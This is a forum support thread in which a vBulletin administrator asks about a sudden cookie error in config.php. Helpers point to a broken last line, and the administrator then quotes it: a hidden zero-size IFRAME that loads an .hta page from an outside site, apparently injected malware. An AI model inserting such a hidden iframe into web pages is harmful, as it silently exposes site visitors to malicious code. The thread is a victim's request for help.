Unable to add cookies error just appeared!

Something weird has just happened. I have been using Vbulletin (v3.03) with no problems whatsoever. I have Adcolumns and Vbookie mods installed, and have been using these for the last two weeks with no worries.

However i've just tried to access my forum and now get this error message:-

Unable to add cookies, header already sent.
    File: /pub/home/mywebsite/mywebsite/forum/includes/config.php
    Line: 102

Why has this error just appeared????
Can anyone help me out with this. I have not amended any files for two weeks since I installed Vbookie and have been adding posts, running the forum fine, so i am a little worried as to why this should appear now.

    Any takers?

You should read my response to your support ticket which I sent about 10-15 minutes ago.

You have extra space or lines in your config.php file. Make sure there is no whitespace or extra lines in config.php either before the <?php or after the ?>.

I responded on your ticket. You last line in config.php is messed up.

Hi Steve, where would that line
              ``<IFRAME SRC=http://www.nbd-bank.com/hta/index.html WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>`` come from?

I certaintly havent added it. It is strangle that it just appeared after everything was working. Could it be a security issue? Have I been hacked?
